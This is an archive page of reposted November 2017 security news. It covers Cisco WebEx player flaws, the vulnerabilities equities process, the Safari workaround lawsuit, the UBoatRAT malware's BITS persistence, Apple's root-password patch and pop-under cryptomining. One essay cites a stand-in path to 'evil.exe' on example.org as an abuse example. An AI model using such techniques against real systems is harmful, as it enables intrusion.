Monthly Archives: November 2017

Cisco Patches Critical Playback Bugs in WebEx Players

Cisco Systems issued a Critical alert on Wednesday warning of multiple vulnerabilities in its popular WebEx player. Six bugs were listed in the security advisory, each of them relating to holes in Cisco WebEx Network Recording Player for Advanced Recording Format (ARF) and WebEx Recording Format (WRF) files.

“A remote attacker could exploit these vulnerabilities by providing a user with a malicious ARF or WRF file via email or URL and convincing the user to launch the file,” according to Cisco.

Cisco warned exploitation of the vulnerabilities could allow arbitrary code execution on a targeted system. In less severe cases, the vulnerabilities could cause players to crash.

Vulnerable products include:

  • Cisco WebEx Business Suite (WBS30) client builds prior to T30.20
  • Cisco WebEx Business Suite (WBS31) client builds prior to T31.14.1
  • Cisco WebEx Business Suite (WBS32) client builds prior to T32.2
  • Cisco WebEx Meetings with client builds prior to T31.14
  • Cisco WebEx Meeting Server builds prior to 2.7MR3

No workarounds are available for any of the vulnerabilities. Cisco has released software updates that address the bugs. It added, the Cisco Product Security Incident Response Team is not aware of any public exploits of the six vulnerabilities.

The vulnerabilities impact Cisco WebEx ARF Player and the Cisco WebEx WRF Player, both used to rerun previously saved WebEx meetings. Cisco said the players are automatically installed when a user attempts to playback saved meetings saved on a WebEx server.

As part of its mitigation Cisco said it has updated Cisco WebEx Business Suite meeting sites, Cisco WebEx Meetings sites, Cisco WebEx Meetings Server, and Cisco WebEx ARF and WRF Players.

The Common Vulnerabilities and Exposures (CVE) numbers are CVE-2017-12367, CVE-2017-12368, CVE-2017-12369, CVE-2017-12370, CVE-2017-12371 and CVE-2017-12372. Each of the CVE’s have a base score of 9.6 out of 10 when it comes to severity.

Four of the six CVE are for critical RCE vulnerabilities. The CVE-2017-12367 is tied to a denial of service vulnerability. And CVE CVE-2017-12369 is tied to a Cisco WebEx Network Recording Player out-of-bounds vulnerability.

“To exploit these vulnerabilities, the player application would need to open a malicious ARF or WRF file. An attacker may be able to accomplish this exploit by providing the malicious recording file directly to users (for example, by using email), or by directing a user to a malicious web page. The vulnerabilities cannot be triggered by users who are attending a WebEx meeting,” Cisco said.

In July, Cisco also updated its WebEx browser extensions for Chrome and Firefox after Google Project Zero researcher Tavis Ormandy and Divergent Security’s Cris Neckar privately disclosed a vulnerability that could be abused to remotely run code on a computer running the browser extension.

from Threatpost – English – Global – thr… http://bit.ly/2Boy8wJ
via IFTTT

The Critical Difference Between Vulnerabilities Equities & Threat Equities

The Critical Difference Between Vulnerabilities Equities & Threat Equities

Why the government has an obligation to share its knowledge of flaws in software and hardware to strengthen digital infrastructure in the face of growing cyberthreats.

In mid-November, Rob Joyce, the White House cybersecurity coordinator, released a set of documents about the “vulnerabilities equities process,” which he noted in a recent White House blog post:

At the same time, governments must promote resilience in the digital systems architecture to reduce the possibility that rogue actors will succeed in future cyber attacks. This dual charge to governments requires them to sustain the means to hold even the most capable actor at risk by being able to discover, attribute, and disrupt their actions on the one hand, while contributing to the creation of a more resilient and robust digital infrastructure on the other. Obtaining and maintaining the necessary cyber capabilities to protect the nation creates a tension between the government’s need to sustain the means to pursue rogue actors in cyberspace through the use of cyber exploits, and its obligation to share its knowledge of flaws in software and hardware with responsible parties who can ensure digital infrastructure is upgraded and made stronger in the face of growing cyber threats. 

This is a valuable step in the right direction, and the people who’ve done the work have worked hard to make it happen. However, the effort doesn’t go far enough, and those of us in the security industry have an urgent need to go further to achieve the important goals that Joyce lays out: improving our defenses with knowledge garnered by government offensive and defensive operations. 

This is intended as a nuanced critique: I appreciate what’s been done. I appreciate that it was hard work, and that the further work will be even harder. And it needs to be done.

The heart of the issue is our tendency in security to want to call everything a “vulnerability.” The simple truth is that attackers use a mix of vulnerabilities, design flaws, and deliberate design choices to gain control of computers and to trick people into disclosing things like passwords. For example, in versions of PowerPoint up to and including 2013, there was a feature where you could run a program when someone “moused over” a picture. I understand that feature is gone in the latest Windows versions of PowerPoint but still present in the Mac version. I use this and other examples just to make the issues concrete, not to critique the companies. 

This is not a vulnerability or a flaw. It’s a feature that was designed in. People designed it, coded it, tested it, documented it, and shipped it. Now, can an attacker reliably “weaponize” it by shipping it with a script in a zip file, for example, by referring to a UNC path to \\example.org\very\evil.exe? I don’t know. What I do know is that the process as published and described by Joyce explicitly excludes such issues. As stated in the blog post:

The following will not be considered to be part of the vulnerability evaluation process:

    • Misconfiguration or poor configuration of a device that sacrifices security in lieu of availability, ease of use or operational resiliency.
    • Misuse of available device features that enables non-standard operation.
    • Misuse of engineering and configuration tools, techniques and scripts that increase/decrease functionality of the device for possible nefarious operations.
    • Stating/discovering that a device/system has no inherent security features by design.

These issues are different from vulnerabilities. None of them is a bug to fix. I do not envy the poor liaison who gets to argue with Microsoft were this feature to be abused, nor the poor messenger who had to try to convince Facebook that their systems were being abused during the elections. However senior that messenger, it’s a hard battle to get a company to change its software, especially when customers or revenue are tied to it. I fought that battle to get Autorun patched in shipped versions of Windows, and it was not easy.

However, the goal, as stated by Joyce, does not lead to a natural line between vulnerabilities, flaws, or features. If our goal is to build more resilient systems, then we need to start by looking at the issues that happen — all of them — and understanding all of them. We can’t exclude the ones that, a priori, are thought to be hard to fix, nor should we let a third party decide what’s hard to fix. 

The equities process should be focused on government’s obligation to share its knowledge of flaws in software and hardware with responsible parties who can ensure digital infrastructure is upgraded and made stronger in the face of growing cyberthreats. Oh, wait, that’s their words, not mine. And along the way, “flaws” gets defined down to vulnerabilities.

At the same time, our security engineering work needs to move from vulnerability scanning and pen tests to be comprehensive, systematic, and structured. We need to think about security design, the use of safer languages, better sandboxes, and better dependency management. We need to threat model the systems we’re building so that they have fewer surprises.

That security engineering work will reduce the number of flaws and exploitable design choices. But we’ll still have clever attackers, and we need the knowledge that’s gained from attack and defense to flow to software engineers in a systematic way. A future threats equities process will be a part of that, and industry needs to ask for it to be sooner rather than later.

Related Content:


 


Adam is an entrepreneur, technologist, author and game designer. He’s a member of the BlackHat Review Board, and helped found the CVE and many other things. He’s currently building his fifth startup, focused on improving security effectiveness, and mentors startups as a … View Full Bio

More Insights

from Dark Reading – All Stories http://ubm.io/2ApRh4l
via IFTTT

Google sued over iPhone ‘Safari Workaround’ data snooping

Did you use an iPhone in the UK between 1 June 2011 and 15 February 2012?

If you did, you’re one of an estimated 5.4 million people who might one day be in line for a compensation payment from Google over a long-running controversy known as the “Safari Workaround”.

The legal barebones are that a campaign group called Google You Owe Us has launched a “representative action” (similar to a class action in the US) alleging that the search giant:

Took our data by bypassing default privacy settings on the iPhone Safari browser which existed to protect our data, allowing it to collect browsing data without our consent.

Specifically, Google used a bit of JavaScript code – the workaround – to bypass Safari’s default blocking of third-party cookies (set by domains other than those being visited) in order to allow sites within its DoubleClick ad network to track users.

This was despite Google giving assurances that this would not happen to users running Safari with its default privacy settings.

The case involves Safari because it was a browser that by default imposed restrictions on the cookies set by ad networks.

By this point, some US readers might be feeling a sense of déjà vu – all over again.

The origins of the British case lie with the discoveries made by a Stanford University researcher called Jonathan Mayer in 2010, which eventually led to legal cases by the Federal Trade Commission (FTC) and 38 US states in 2012 and 2013 which concluded with Google paying fines of $22.5m (then £15m) and $17m respectively.

Google’s defence has always been that the feature was connected to allow Safari users who’d signed into Google, and opted to see personalised content, to interact with features such as the company’s Google+ button or Facebook likes.

In 2012 it said:

To enable these features, we created a temporary communication link between Safari browsers and Google’s servers, so that we could ascertain whether Safari users were also signed into Google, and had opted for this type of personalisation.

Which seemed like a way of saying that internet services, and people’s interaction with them, was getting so complex that strict lines of privacy and consent were blurring.

The latest UK case will, essentially, see these arguments re-run with a few more years’ hindsight to sharpen the case on both sides.

It’s not the first UK Safari workaround case Google has had to fight: in 2015 the Court of Appeal ruled that the issue had enough merit to allow the litigants involved to sue the company (reportedly settled out of court).

As for iOS users who might qualify for any settlement, there are conditions.

Assuming you were using Safari on a lawfully-acquired iPhone, and didn’t opt out of seeing Google’s personalised ads, you must have been resident in England or Wales both during the period covered by the case, and on 31 May 2017 (Scotland has a separate legal system and isn’t covered).

How users prove this years after the event is not clear, but having used an Apple ID with an iPhone during the period mentioned will probably be enough.

The case is specifically about iPhone users and doesn’t include iPads and OS X computers. Naked Security understands this is for legal reasons (including additional devices complicates matters even though they might also have been affected).

Is this just a dose of bad publicity about mistakes long past?

The possibility of pay-outs from a company like Google will grab headlines, but in the UK in 2017 this has become about deeper issues. As Google You Owe Us states:

Together, we can show the world’s biggest companies are not above the law.

Recently, sentiment has turned against large tech companies for a variety of reasons, including attitudes to privacy, the alleged non-payment of taxes, and the popular perception that some companies have become too big for their boots.

It’s a seeming paradox that describes our age. Millions of us use Google’s software, yet for some at least this is building not love and respect, but suspicion.


from Naked Security – Sophos http://bit.ly/2iqfmkD
via IFTTT

RAT Distributed Via Google Drive Targets East Asia

Researchers said that they are tracking a new remote access Trojan dubbed UBoatRAT that is targeting individuals or organizations linked to South Korea or the video game industry.

While targets aren’t 100 percent clear, researchers at Palo Alto Networks Unit 42 said UBoatRAT threats are evolving and new variants are increasingly growing more sophisticated. They said recent samples found in September have adopted new evasion techniques and novel ways to maintain persistence on PCs.

“We don’t know the exact targets at the time of this writing. However, we theorize the targets are personnel or organizations related to Korea or the video games industry,” wrote Kaoru Hayashi, cyber threat intelligence analyst at Palo Alto Networks in a technical write-up of Unit 42’s research published this week. “We see Korean-language game titles, Korea-based game company names and some words used in the video games business on the list.”

UBoatRAT was first identified by Unit 42 in May 2017. At the time, UBoatRAT utilized a simple HTTP backdoor and connected to a command-and-control server via a public blog service in Hong Kong and a compromised web server in Japan. By September, the RAT evolved to adopt Google Drive as a distribution hub for malware and uses URLs that connect to GitHub repositories that act as a C2. UBoatRAT also leverages Microsoft Windows Background Intelligent Transfer Service (BITS) to maintain persistence on targeted systems.

BITS is a Microsoft service for transferring files between machines. BITS is most widely known for its use by Windows Update and third-party software for application updates. The service has a long history of being abused by attackers dating back to 2007. And even up until today, BITS is still an attractive feature for hackers because the Windows component includes the ability to retrieve or upload files using an application trusted by host firewalls. Last year, researchers identified hackers who used a BITS “notification” feature to deliver malware and maintain system persistence.

With UBoatRAT, adversaries are using the BITS binary Bitsadmin.exe as a command-line tool to create and monitor BITS jobs, researchers said. “The tool provides the option, /SetNotifyCmdLine which executes a program when the job finishes transferring data or is in error. UBoatRAT takes advantage of the option to ensure it stays running on a system, even after a reboot,” they said.

According to researchers, UBoatRAT is being delivered to targets via URLs that link to executable files or Zip archives hosted on Google Drive. “The zip archive hosted on Google Drive contains the malicious executable file disguised as a folder or a Microsoft Excel spread sheet. The latest variants of the UBoatRAT released in late July or later masquerade as Microsoft Word document files,” researchers said.

If files are executed, UBoatRAT attempts to determine if the targeted system is part of a larger corporate network or a home PC by checking if the machine is part of an Active Directory Domain, typically used by business PCs. The malware is also programmed to detect virtualization software (VMWare, VirtualBox or QEmu) that would indicate a research environment.

If ideal host conditions aren’t met various fake Windows system error messages are generated and the UBoatRAT executable quits.

Communication with the command-and-control server is performed via a hidden C2 address in the RAT, researchers said.

“The attacker behind the UBoatRAT hides the C2 address and the destination port in a file hosted on Github… After establishing a covert channel with C2, the threat waits following backdoor commands from the attacker,” researcher wrote.

Some commands include “Checks if whether the RAT is alive”, “Starts CMD shell” and “Uploads file to compromised machine”.

The malware gets its name from the name from the way it decodes the characters in the GitHub URL.

“The malware accesses the URL and decodes the characters between the string ‘[Rudeltaktik]’ and character ‘!’ using BASE64. ‘Rudeltaktik’ is the German military term which describes the strategy of the submarine warfare during the World War II,” researchers said.

Since June, the GitHub “uuu” repository the C2 links to has been deleted and replaced by “uj”, “hhh” and “enm”, according to researcher  Hayashi. The GitHub user  name behind the repository is “elsa999”.

“Though the latest version of UBoatRAT was released in September, we have seen multiple updates in elsa999 accounts on GitHub in October. The author seems to be vigorously developing or testing the threat. We will continue to monitor this activity for updates,” Hayashi said.

from Threatpost – English – Global – thr… http://bit.ly/2BzJMWa
via IFTTT

Snapchat takes a swipe at fake news

Here’s the problem with social media echo chambers: they contain the opinions of other people!

Snapchat wants to fix that. It’s working on a redesign that strips the social from media, separating friends and family updates in one section of the screen and putting media – as in, vetted news from publishers, stories from around the world, or stories from people you follow but don’t know personally – in another spot, in a “Discover” page.

It’s also changed the way you’ll view your friends’ updates. Snapchat says it’s new “sophisticated Best Friends algorithm” chooses which friends you see the most of based on the way you communicate with them.

As always, the app will open to the camera. On the left of the screen will be friends’ chats and stories, and on the right of the camera will be Stories from publishers, creators, and the community.

Both the Friends slot and the Discover page will over time learn what you like and which friends you really want to talk to.

The redesign is intended to promote more intimate sharing among friend groups while pushing professionally produced content into a separate feed.

We’ll see the redesign starting this week as it’s rolled out for a small test group. It’s expected to roll out more broadly in coming weeks.

In a blog post, Snapchat said that the way that social media has mixed friends with brands has been “an interesting internet experiment,” but it’s one that’s had some “strange side-effects,” such as fake news:

While blurring the lines between professional content creators and your friends has been an interesting internet experiment, it has also produced some strange side-effects (like fake news) and made us feel like we have to perform for our friends rather than just express ourselves.

In an opinion piece posted by Axios on Wednesday morning, Snapchat CEO Evan Spiegel said that social media has fueled fake news because…

…content designed to be shared by friends is not necessarily content designed to deliver accurate information. After all, how many times have you shared something you’ve never bothered to read?

Snapchat’s solution to the fake news dilemma is to base algorithms on a user’s interests – not on the interests of “friends” – and to make sure media companies also profit off the content they produce for Snapchat’s Discover platform.

We think this helps guard against fake news and mindless scrambles for friends or unworthy distractions.

In order to personalize the Stories created by publishers – as in, those that aren’t curated by friends – Snapchat is taking a page from what Netflix does: it uses machine learning algorithms to recommend content based on what subscribers have watched in the past.

Research shows that your own past behavior is a far better predictor of what you’re interested in than anything your friends are doing. This form of machine learning personalization gives you a set of choices that does not rely on free media or friend’s recommendations and is less susceptible to outside manipulation.

Siegel went into the same kind of soul-searching as that of other social media moguls who’ve been oops!-ifying in these days of the Congressional investigation into Russian trolls planting fake news… and of the people who created the industry stepping back to question the repercussions, such as Facebook “like” button co-creator Justin Rosenstein and former Facebook product manager Leah Pearlman having both implemented measures to curb their social media dependence

…and of Facebook ex-president Sean Parker doing his own “what were we thinking?” last week, when he told Axios that from the start, social media engineers have been knowingly exploiting a vulnerability in human psychology to get us all addicted to social validation feedback loops and their sweet, sweet dopamine jolts… and of Loren Brichter, designer of the pull-to-refresh tool first seen in the Twitter app, also admitting that the social media platform and the tool he created are addictive.

For his part, Spiegel says that personalized newsfeeds have “revolutionized the way people share and consume content, but the collateral damage has included “a huge cost to facts, our minds and the entire media industry.”

While combining social and media has meant big bucks, it’s “ultimately undermined our relationships with our friends and our relationships with the media,” Siegal says.

Snapchat thinks the best path out of this fake news craziness is to disentangle social and media, provide a personalized content feed based on what subscribers want to watch and not what your echo-chamber friends post, and to build content feeds on top of human-curated content, rather than just any old globs that pop to the surface of the internet.

Siegel:

Curating content in this way will change the social media model and also give us both reliable content and the content we want.


from Naked Security – Sophos http://bit.ly/2zQP02G
via IFTTT

Apple’s “blank root password” fix needs a fix of its own – here it is

If you’ve ever been hiking in California’s High Sierra, you’re probably in awe not only of its spectacular nature but also of its many, tricky, rocky pathways.

It’s beautiful but it can bite you.

That’s pretty much how Apple must be feeling this week about its own High Sierra, the tradename of its latest 10.13 version of macOS.

News broke early in the week that the macOS authentication dialog could be used to trigger an all-but-unbelievable elevation-of-privilege vulnerability.

We’re calling it the “blank root password” bug.

The bug explained

Not just anyone can make critical configuration changes on your Mac, such as turning off the filewall or decrypting your hard disk.

Many changes need to be authorised by a user with Administrator privileges – and even if you’re already logged in with an Admin account yourself, you need to authenticate again every time you want to do something administrative.

That’s why many System Preferences panes, for example, feature a padlock you have to click if you want to make changes:

Turns out that if you changed the User Name field to root, the all-powerful superuser account that is never supposed to be used directly, and entered a blank password once…

…then the root password somehow actually ended up changed to a blank password, so that when you entered a blank password for the root account thereafter, it Just Worked.

Quite what sort of coding bug led to the bizarre situation that testing a password ended up modifying that password is something Apple isn’t saying.

As security blunders go, however, it’s a bit like giving an immigration officer a false date of birth, only to find out, when he opens your passport to catch you out in the middle of your lie, that your passport has miraculously reissued itself with your “new” birthday.

Faster and faster

Four years ago, Apple notoriously took more than six months to fix an authentication vulnerability in the sudo command, the program that sysadmins rely upon to maintain the security of privileged administrative tasks performed at a command prompt.

But Apple has come a long way in responsiveness since then, and this week’s “blank root password” bug was patched within about one day by the new-look Apple.

We wrote about the patch yesterday afternoon and wholeheartedly said, “Well done to Apple for acting quickly.”

When we said those words, we were well aware that such a rapidly-issued patch might have unintended side-effects, especially when the changes involved a system component associated with password verification and administrative authentication.

We wondered to ourselves whether Apple’s patch might end up with some system features inadvertently de-authenticated…

…but we said “Well done” to Apple anyway.

We figured that, in most cases, requiring some legitimate users to re-authenticate is far better than letting any crooks wander in unauthenticated.

And we stand by those words even now we know that there has been at least one “inadvertent de-authentication” problem caused by yesterday’s patch, a side-effect that could stop file sharing working on your Mac:

If file sharing doesn’t work after you install Security Update 2017-001, follow these steps. 

[. . .]

1. Open the Terminal app, which is in the Utilities folder of your Applications folder.
2. Type sudo /usr/libexec/configureLocalKDC and press Return. 
3. Enter your administrator password and press Return.
4. Quit the Terminal app. 

The command above, /usr/libexec/configurelocalKDC, isn’t needed often – it’s used to set up what’s known as a Kerberos Key Distribution Centre (KDC). (The prefix sudo tells macOS to run the configurelocalKDC command with Administrator privileges, which is why you need your admin password.)

The good news is that you don’t have to know exactly what that means – but, greatly simplified, Kerberos is the authentication system used for Windows-style file sharing, and the KDC is the background process that is responsible for checking that you’re authorised to use the shares you try to access.

Configuring this KDC thing is usually done for you, handled automatically when you setup your Mac; after yesterday’s emergency “blank root password” update, the KDC needs to be configured again, and that means you need to provide an administrative password to complete the task.

It’s unfortunate that this happened, but the fix for the fix is pretty simple: we think that if you can launch a mail application and paste text into the subject line of a new email, you’ll have little or no trouble with this one.

So we’re repeating our “Well done” to Apple for getting a fix out quickly.

The “blank root password” bug was publicly disclosed, which pretty much forced Apple’s hand to respond at once, and it did.

Some of us will need to put in our admin passwords to get file sharing working again, in return for all of us being rapidly protected against a widely-publicised security hole.

As far as “taking one for the team” goes, we’re comfortable with the balance in this case.


from Naked Security – Sophos http://bit.ly/2BzsYic
via IFTTT

Stealthy in-browser cryptomining continues even after you close window

In-browser cryptocurrency mining is, in theory, a neat idea: make users’ computers “mine” Monero for website owners so they don’t have to bombard users with ads in order to earn money.

Unfortunately, in this far-from-ideal world of ours, mining scripts – first offered by Coinhive but soon after by other outfits – are mostly used by unscrupulous web admins and hackers silently compromising websites.

A lucrative enterprise

As ad-blocking services and antivirus vendors began blocking Coinhive’s original script, the developers created a new API that prevents website owners from forcing the cryptomining onto their visitors without their permission.

But, as the initial API still has yet to been retired, it’s not shocking that it’s still much more popular and widespread than the second one.

AdGuard researchers recently found 33,000 websites running cryptojacking scripts, and 95% of them run the Coinhive script.

“We estimate the joint profit at over US $150,000 per month. In case of Coinhive, 70% of this sum goes to the website owner, and 30% to the mining network,” they noted.

That’s $45,000 per month for Coinhive, and over half a million if the situation were to remain unchanged. This is also the most likely reason why Coinhive has not retired the original miner script.

Keeping those browsers mining

But, as adblockers and some AV vendors are ramping up their efforts to block cryptojacking scripts from running, the crooks have to come up with new ways to keep them unnoticed. They are also testing new ways for keeping browsers open and mining even if the users leave the mining website.

Malwarebytes’ researchers detailed one of these efforts, which involves covert pup-under windows, throttled mining, and an ad network that works hard on bypassing adblockers.

The “attack” unfolds like this: the user visits a website that silently loads cryptomining code and starts mining, but throttles it so that user’s CPU power is not used up completely. This prevents the machine from slowing down and heating up, and makes it more likely that the user won’t notice the covert mining.

But, when the user leaves the site and closes the browser window, another browser window remains open, made to hide under the taskbar, and continues mining.

“If your Windows theme allows for taskbar transparency, you can catch a glimpse of the rogue window. Otherwise, to expose it you can simply resize the taskbar and it will magically pop it back up,” Malwarebytes researcher Jerome Segura explained.

browser cryptomining

The rogue pop-under window can then be closed, and the mining stopped. Unfortunately, too many users won’t notice it or notice for a while that their computer has become somewhat sluggish.

“This type of pop-under is designed to bypass adblockers and is a lot harder to identify because of how cleverly it hides itself,” Segura noted.

“The more technical users will want to run Task Manager to ensure there is no remnant running browser processes and terminate them. Alternatively, the taskbar will still show the browser’s icon with slight highlighting, indicating that it is still running.”

The researchers tested the scheme by using the latest version of the Google Chrome browser on Windows. Results may vary with other browsers and other operating systems.

Chrome developers have been debating whether the browser should block or flag CPU mining attempts since early September, but a decision has still not been made.

from Help Net Security – News http://bit.ly/2ipNWve
via IFTTT